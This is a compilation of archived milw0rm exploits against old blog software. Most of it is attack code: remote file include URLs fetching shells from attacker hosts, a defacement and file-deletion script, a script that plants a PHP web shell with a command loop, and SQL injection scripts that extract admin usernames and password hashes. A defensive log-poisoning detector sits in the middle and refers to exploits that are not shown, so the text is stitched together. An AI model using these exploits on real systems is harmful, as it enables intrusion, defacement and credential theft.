# milw0rm.com [2006-11-10]

IrayoBlog 0.2.4 Remote File Include
Code:
http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?

vBlog / C12 0.1 Remote File Include
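The sBLOG and WikyBlog exploits above need two requests that both end up in the web server's logs: one whose path or User-Agent carries a PHP open tag (Apache writes it verbatim into access_log or error_log), and one that includes that log through a parameter terminated with %00, the null byte that cut off the appended ".php" on old PHP builds. The mBlog disclosure earlier is the include step without the poisoning. Below is an added detection example for this thread, written by me and not taken from the page or from any project: it walks Apache combined-format lines in order, flags PHP tags in logged fields, flags traversal-plus-null-byte includes (with a sharper tag when the target is a log file), and raises a chain finding when the same client did both. The log lines are constructed and the combined log format is assumed.

```python
"""Detection for log poisoning and null-byte LFI over Apache access logs.

Added example; not code from the page or from any project it lists.
Sample log lines below are constructed to look like the exploits above.
"""
import re
from typing import Optional

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php\b|=)", re.I)               # PHP open tag in a logged field
TRAVERSAL = re.compile(r"(\.\./|\.\.%2f|\.\.%5c)", re.I)  # ../ raw or URL-encoded
NULL_BYTE = re.compile(r"%00")                            # truncates the appended extension
LOG_PATH = re.compile(r"(access|error)[_.]log", re.I)     # the include targets a web log

SAMPLE_LOG = [
    # constructed: poisoning request, PHP in both the path and the User-Agent (sBLOG step 1)
    '10.0.0.7 - - [29/Mar/2007:10:00:01 +0000] "GET /blog/<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?> HTTP/1.1" 404 287 "-" "<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>"',
    # constructed: the include step from the same client (sBLOG step 2)
    '10.0.0.7 - - [29/Mar/2007:10:00:03 +0000] "GET /blog/inc/lang.php?conf_lang_default=../logs/error.log%00&cmd=id HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    # constructed: ordinary traffic
    '192.0.2.10 - - [29/Mar/2007:10:00:05 +0000] "GET /blog/index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # constructed: mBlog-style disclosure, traversal plus null byte but no log file
    '192.0.2.55 - - [29/Mar/2007:10:01:00 +0000] "GET /blog/index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1801 "-" "Mozilla/5.0"',
    # constructed: WikyBlog-style log include with no earlier poisoning request from this client
    '198.51.100.2 - - [01/Dec/2006:09:00:00 +0000] "GET /wikyblog/include/WBmap.php?l=../../../../../var/log/httpd/access_log%00 HTTP/1.1" 200 9001 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"',
]


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines) -> list:
    """Walk the log in order and return findings: dicts with tag, client and request.
    A client that first plants a PHP tag and later includes a log file also gets
    a log_poisoning_chain finding, which is the one worth paging on."""
    findings = []
    poisoned = set()  # clients that have written a PHP tag into the log
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        req, client = e["request"], e["client"]
        if any(PHP_TAG.search(e[f]) for f in ("request", "referer", "agent")):
            findings.append({"tag": "php_in_log", "client": client, "request": req})
            poisoned.add(client)
        if TRAVERSAL.search(req) and NULL_BYTE.search(req):
            if LOG_PATH.search(req):
                findings.append({"tag": "lfi_log_include", "client": client, "request": req})
                if client in poisoned:
                    findings.append({"tag": "log_poisoning_chain", "client": client, "request": req})
            else:
                findings.append({"tag": "lfi_null_byte", "client": client, "request": req})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['tag']:22} {f['client']:14} {f['request']}")
```

The chain rule is order-dependent on purpose: the poisoning request has to precede the include, which is why the function reads the file top to bottom rather than grepping each pattern separately. The null-byte check is what separates these old-PHP chains from a generic traversal; on PHP 5.3.4 and later the same include still fails the extension append, so a traversal without %00 against those engines is noise rather than a hit.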
Light Blog Multiple Vulnerabilities PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "\r\n"; echo "Light Blog Multiple Vulnerabilities Exploit\r\n"; echo "by BlackHawk <[email protected]>\r\n"; echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n"; echo "Host: target server (ip/hostname)\r\n"; echo "Path: path to LightBlog\r\n"; echo "AttackType: 1 - Create New Post (Title must be of one word)\r\n"; echo " |-> Related: Title Post\r\n"; echo " |-> Es: php ".$argv[0]." localhost /blog/ 1 Hacked I Got You\r\n\r\n"; echo " 2 - Deface Blog (With XSS)\r\n"; echo " |-> Related: WebPage\r\n"; echo " |-> Es: php ".$argv[0]." localhost /blog/ 2 http://site.com/\r\n\r\n"; echo " 3 - Deface Blog (Deleting blog.php)\r\n"; echo " |-> Related: NickName\r\n"; echo " |-> Es: php ".$argv[0]." localhost /blog/ 3 BlackHawk\r\n\r\n"; echo ""; echo "\r\n"; echo ""; die; } /* There are some critical vulnerabilities in this quite simple Blog Engine.. 1 - You do not need to know the right password to send a new Post (no cecking); 2 - You can erase (even with mq=on) all file that are stored on the server: [...] $t = stripslashes($t); [...] $fc = fopen ("blog_comments/$t.txt", "w"); fwrite ($fc, ""); [...] 
3-Using point No 1 you can do some XSS couse there isn't any anti-Xss code for admins 4-If mq=on than you can deface the site (but no injecting PHP cause < and > are properly parsed) sorry for my bad english, BlackHawk [email protected] */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $attack_type=$argv[3]; $port=80; $proxy=""; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} switch($attack_type) { case 1: //Insert New Post $title=$argv[4]; $message=""; for ($i=5; $i<=$argc-1; $i++){ $message.=" ".$argv[$i]; } $title=urlencode($title); $message=urlencode($message); echo "Attack No 1 - Sending New Post..\r\n"; $data="t=$title"; $data.="&c=$message"; $data.="&Submit=Post"; $packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "Ok, Post Sent"; break; case 2: // Deface With XSS $dfc_url=$argv[4]; $deface_url=urlencode("<script>window.location=('$dfc_url')</script>"); echo "Attack No 2 - Sending New Post With XSS..\r\n"; $data="t=$deface_url"; $data.="&c=msg"; $data.="&Submit=Post"; $packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "Ok, Post 
Sent"; break; break; case 3: // Defacing the original blog.php file $nickname=$argv[4]; $packet ="GET ".$p."LightBlog/blog_comments.php?comment=Comment&title=title HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("name=\"rand\" id=\"rand\" value=\"",$html); $temp2=explode("\"></input>",$temp[1]); $random_code = $temp2[0]; $temp=explode("name=\"rand\" id=\"rand\" value=\"$random_code\"></input>",$html); $temp2=explode(" ",$temp[1]); $small_code = $temp2[0]; $data="t=../../blog.php%00"; $data.="&c=ciao"; $data.="&Submit=Post"; $packet="POST ".$p."/LightBlog/blog_script.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "blog.php File erased\r\n"; // This part will work only if mq=off elsewhere the exploit will only delete blog.php $deface_text=urlencode("|:. $nickname got you! 
.:"); $signature=urlencode(" BlackHawk And Piggy-Marty Rulez info --> <[email protected]>"); $packet ="GET ".$p."LightBlog/add_comment_script.php?name=$deface_text&comment=$signature&rand=$random_code&val=$small_code&Submit=Submit&title=../../blog.php/%00 HTTP/1.0\r\n"; $packet.="Referer: http://".$host.$path."blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); echo "Ok, Blog Defaced"; break; } ?> # milw0rm.com [2006-10-27] Def-Blog <= v1.0.1 SQL Injection OpenDock Easy Blog <=1.4 File Include A-Blog v2.0 Remote File Include Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin PHP: #!/usr/bin/perl # # Affected.scr..: Blog Pixel Motion V2.1.1 # Poc.ID........: 12060927 # Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode) # Risk.level....: High # Vendor.Status.: Unpatched # Src.download..: www.pixelmotion.org/zip/blog2.1.zip # Poc.link......: acid-root.new.fr/poc/12060927.txt # Credits.......: DarkFig # # print "This exploit is for educational purpose only" x 999; exit; # use LWP::UserAgent; use HTTP::Request::Common; use HTTP::Response; use Getopt::Long; use strict; print STDOUT "\n+", '-' x 60, "+\n"; print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n"; print STDOUT '+', '-' x 60, "+\n"; my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res,$re); my $opt = GetOptions( 'host=s' => \$host, 'path=s' => \$path, 'proxh=s' => \$proxh, 'proxu=s' => \$proxu, 'proxp=s' => \$proxp, 'choice=s' => \$choice); if(!$host) { print STDOUT "| Usage: ./zz.pl --host=[www] --path=[/] --choice=[0] |\n"; print STDOUT "| [Choice.] 
1=PHP_Code_Execution 2=Create_Admin |\n"; print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n"; print STDOUT '+', '-' x 60, "+\a\n"; exit(1); } if($host !~ /http/) {$host = 'http://'.$host;} if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';} if(!$path) {$path = '/';} if(!$choice) {$choice = 2;} my $ua = LWP::UserAgent->new(); $ua->agent('0xzilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; $re->proxy_authorization_basic($proxu, $proxp) if $proxp; if($choice == 1) { $re = POST $host.$path.'config.php', [ 'nom_blog' => '"; $shcode = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65); $shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54); $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D); $shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74); $shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69); $shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65); $shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54); $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D); $shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A); eval($shcode); die(); //']; $ua->request($re); while(<STDIN>){ chomp($cmd = $_); if($cmd eq 'exit') { exit(0); } $re = GET $host.$path.'include/variables.php?cmd='.$cmd; $res = $ua->request($re); print STDOUT "\n\n".$res->content."\n\$sh: "; } } else { $re = GET $host.$path.'insere_base.php?login=woot&pass=t00w'; $ua->request($re); print STDOUT "[+] Admin login.: woot\n"; print STDOUT "[+] Admin passwd: t00w\n"; print STDOUT '+', '-' x 60, "+\n"; } # milw0rm.com [2006-09-27] A-Blog V2 Remote File Include Code: http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php? 
Spidey Blog Script <= 1.5 SQL Injection
PHP:
#!/usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186

use LWP::Simple;

print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";

# the original tested "!$ARGV[0]=~/http/", which negates before matching; the intent is "path must contain http"
if(!$ARGV[0] or $ARGV[0]!~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick')) {
    print "Usage : perl $0 [path] [function]\n";
    print "path ==> http://www.example.com/blog/\n";
    print "function ==> nick OR password\n";
    print "Example : perl $0 http://site.org/blog/ nick\n";
    exit(0);
} else {
    if($ARGV[1] eq 'nick'){
        # column 6 of the UNION is reflected into the page; pull the admin login from uyeler
        $url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
        $page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
        print "[+] Connected to: $ARGV[0]\n";
        $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
        print "[-] Unable to retrieve username\n" if(!$1);
    } else {
        # same column, password hash (sifre) instead of login
        $code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
        $page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
        print "[+] Connected to: $ARGV[0]\n";
        $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
        print "[-] Unable to retrieve password\n" if(!$1);
    }
}
#To Be Or Not To Be!
# milw0rm.com [2006-09-24]
xweblog <= 2.1 SQL Injection
Code:
http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler

TualBLOG 1.0 SQL Injection
Code:
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1

SimpleBlog <= 2.3 SQL Injection
Code:
http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1

icblogger v2 SQL Injection
Code:
http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1
Admin panel:

SimpleBlog <= 2.0 SQL Injection
PHP:
#!/usr/bin/perl
#Method found by Chironex Fleckeri
#Exploit By ASIANEAGLE
#Contact:[email protected]
#Original advisory: http://www.milw0rm.com/exploits/2228
#Usage: exploitname.pl <host> <path> <id>

use IO::Socket;

if(@ARGV != 3) { usage(); } else { exploit(); }

sub header() {
    print " *****SimpleBlog 2.0 SQL Injection Exploit***** \r\n";
    print " *****www.asianeagle.org***** \r\n";
}

sub usage() {
    header();
    print " *Usage: $0 <host> <path> <id>\r\n";
    print " *<host> = Victim's host ex: www.site.com\r\n";
    print " *<path> = SimpleBlog Path ex: /SimpleBlog/\r\n";
    print " *<id> = Admin ID ex: 1\r\n";
    exit();
}

sub exploit () {
    $simserver = $ARGV[0];
    $simserver =~ s{^http://}{};
    $simhost = "http://".$simserver;
    $simdir = $ARGV[1];
    $simport = "80";
    $simtar = "comments.asp?id=";
    # UNION into comments.asp; the username/password columns land in the comment author cells
    $simsql = "-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS%20WHERE%20id%20like%20".$ARGV[2];
    $simreq = $simhost.$simdir.$simtar.$simsql;
    header();
    print "- Trying to connect: $simserver\r\n";
    $sim = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$simserver", PeerPort => "$simport") || die "- Connection failed...\n";
    print $sim "GET $simreq HTTP/1.1\n";
    print $sim "Accept: */*\n";
    print $sim "Referer: $simhost\n";
    print $sim "Accept-Language: tr\n";
    print $sim "User-Agent: Mozzilla\n";
    print $sim "Cache-Control: no-cache\n";
    print $sim "Host: $simserver\n";
    print $sim "Connection: close\n\n";
    print "Connected...\r\n";
    while ($answer = <$sim>) {
        # the injected ID is echoed back first; if it is not there the UNION did not work
        if ($answer =~ /class=\"c_content\">(.*?)<\/td><\/tr>/) {
            if ($1 == $ARGV[2]) { print "Seems Vulnerable :)\r\n"; }
            else { die "- Exploit failed\n"; }
        }
        if ($answer =~ /class=\"c_content\"><b>(.*)<\/b>/) { print "- Username: $1\r\n"; }
        # uPASSWORD is selected into the e-mail column, so it shows up inside the mailto: link
        if ($answer =~ /href=\"mailto:(.*?)\">(.*?)<\/a>/) { print "- Password: $1\r\n"; }
    }
}
# milw0rm.com [2006-08-20]

LBlog <= 1.05 SQL Injection
Code:
http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1
Admin panel:

SAPID Blog <= beta 2 Remote File Include

myBloggie <= 2.1.4 Multiple SQL Injections
PHP:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
echo "administrative credentials disclosure exploit\n";
echo "by rgod [email protected]\n";
echo "site: http://retrogod.altervista.org\n\n";

/* works regardless of php.ini settings against MySQL >= 4.1 (allowing subs) */

if ($argc<3) {
    echo "Usage: php ".$argv[0]." host path OPTIONS\n";
    echo "host: target server (ip/hostname)\n";
    echo "path: path to MyBloggie\n";
    echo "Options:\n";
    echo " -i specify an existent post id (default: 1)\n";
    echo " -T[prefix] specify a table prefix different from default (mb_)\n";
    echo " -p[port]: specify a port other than 80\n";
    echo " -P[ip:port]: specify a proxy\n";
    echo " -d: disclose table prefix (recommended)\n";
    echo "Example:\r\n";
    echo "php ".$argv[0]." localhost /MyBloggie/ -d -i7\r\n";
    echo "php ".$argv[0]." localhost /MyBloggie/ -Tm_\r\n";
    die;
}

/*
software site: http://mybloggie.mywebland.com/
vulnerable code in trackback.php:
...
if(!empty($_REQUEST['title'])) {
    $title=urldecode(substr($_REQUEST['title'],0,$tb_title_len));
} else {
    $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No title</p>");
}
if(!empty($_REQUEST['url'])) {
    $url=urldecode($_REQUEST['url']);
    if (validate_url($url)==false) {
        $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>");
    }
} else {
    $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No URL</p>");
}
if(!empty($_REQUEST['excerpt'])) {
    $excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));
} else {
    $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No Excerpt</p>");
}
// The blog name
if(!empty($_REQUEST['blog_name'])) {
    $blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));
} else {
    $blog_name="No Blog Name";
}
$timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ), gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ), gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone ));
$sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' , poster = '$blog_name', home='$url', comment_type='trackback'";
$result = $db->sql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
...

you have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument with MySQL >= 4.1 that allows SELECT subqueries for INSERT...
so you can insert admin username & password hash inside comments and you will see them at screen
also arguments are passed to urldecode(), so you can bypass magic_quotes_gpc with '%2527' sequence for the single quote char
and you can disclose table prefix going to:
http://192.168.1.3/mybloggie/index.php?mode=viewdate
you will have an error that discloses a query fragment

ex., injecting code in 'title' argument, query becomes:
INSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('<!--',password,'-->')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' , poster = 'whatever', home='http://www.suntzu.org', comment_type='trackback'
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// hex/ascii dump helper (kept from the original, only used for debugging)
function quick_dump($string) {
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++) {
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";}
        else {$result.=" ".$string[$i];}
        if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));}
        else {$exa.=" 0".dechex(ord($string[$i]));}
        $cont++;
        if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
    }
    return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

// sends a raw HTTP packet (directly or through an ip:port proxy) and leaves the reply in $html
function sendpacketii($packet) {
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) { echo 'No response from '.$host.':'.$port; die; }
    } else {
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) { echo 'Not a valid proxy...'; die; }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) { echo 'No response from proxy...'; die; }
    }
    fputs($ock,$packet);
    if ($proxy=='') {
        $html='';
        while (!feof($ock)) { $html.=fgets($ock); }
    } else {
        $html='';
        // read byte by byte until the end of the headers (\r\n\r\n) has been seen; the original used eregi(), removed in PHP 7
        while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) { $html.=fread($ock,1); }
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html;
}

// ereg() in the original; preg_match() is the PHP 7+ equivalent
function is_hash($hash) {
    if (preg_match("/^[a-f0-9]{32}/",trim($hash))) {return true;} else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mb_";
$post_id="1"; //admin
$proxy="";
$dt=0;
for ($i=3; $i<$argc; $i++){
    $temp=$argv[$i][0].$argv[$i][1];
    if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); }
    if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); }
    if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); }
    if ($temp=="-i") { $post_id=(int) str_replace("-i","",$argv[$i]); echo "post id -> ".$post_id."\n"; }
    if ($temp=="-d") { $dt=1; }
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// -d: provoke a MySQL syntax error on index.php?mode=viewdate and read the table prefix out of the leaked query
if ($dt) {
    $packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    if (strstr($html,"You have an error in your SQL syntax")) {
        $temp=explode("UNIXTIME(",$html);
        $temp2=explode("posts.timest",$temp[1]);
        $prefix=$temp2[0];
        echo "table prefix -> ".$prefix."\n";
    }
}

// first trackback: the password hash becomes the comment body (wrapped in an HTML comment)
$sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,password,%2527-->%2527)FROM ".$prefix."user)/*";
//some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '<!--' but hash will be clearly visible in comments
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

// second trackback: same trick for the user name
$sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,user,%2527-->%2527)FROM ".$prefix."user)/*";
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

// fetch the post and read both comments back out of the page source
$packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
$temp=explode('"message"><!--',$html);
for ($i=1; $i<count($temp); $i++) {
    $temp2=explode("-->",$temp[$i]);
    if (is_hash($temp2[0])) {
        $hash=$temp2[0];
        $temp2=explode("-->",$temp[$i+1]);
        $admin=$temp2[0];
        echo "----------------------------------------------------------------\n";
        echo "admin -> ".$admin."\n";
        echo "password (md5) -> ".$hash."\n";
        echo "----------------------------------------------------------------\n";
        die();
    }
}
//if you are here...
echo "exploit failed...";
?>
# milw0rm.com [2006-08-07]

LoudBlog <= 0.5 SQL Injection / Admin Credentials Disclosure
PHP:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "a dork: \"Powered by LoudBlog\"\r\n\r\n";

/* works regardless of magic_quotes_gpc settings */

if ($argc<3) {
    echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
    echo "host: target server (ip/hostname)\r\n";
    echo "path: path to LoudBlog\r\n";
    echo "user/pass: you need an account\r\n";
    echo "Options:\r\n";
    echo " -T[prefix] specify a table prefix different from 'lb_'\r\n";
    echo " -p[port]: specify a port other than 80\r\n";
    echo " -P[ip:port]: specify a proxy\r\n";
    echo "Example:\r\n";
    echo "php ".$argv[0]." localhost /loudblog/ \r\n";
    die;
}

error_reporting(0);
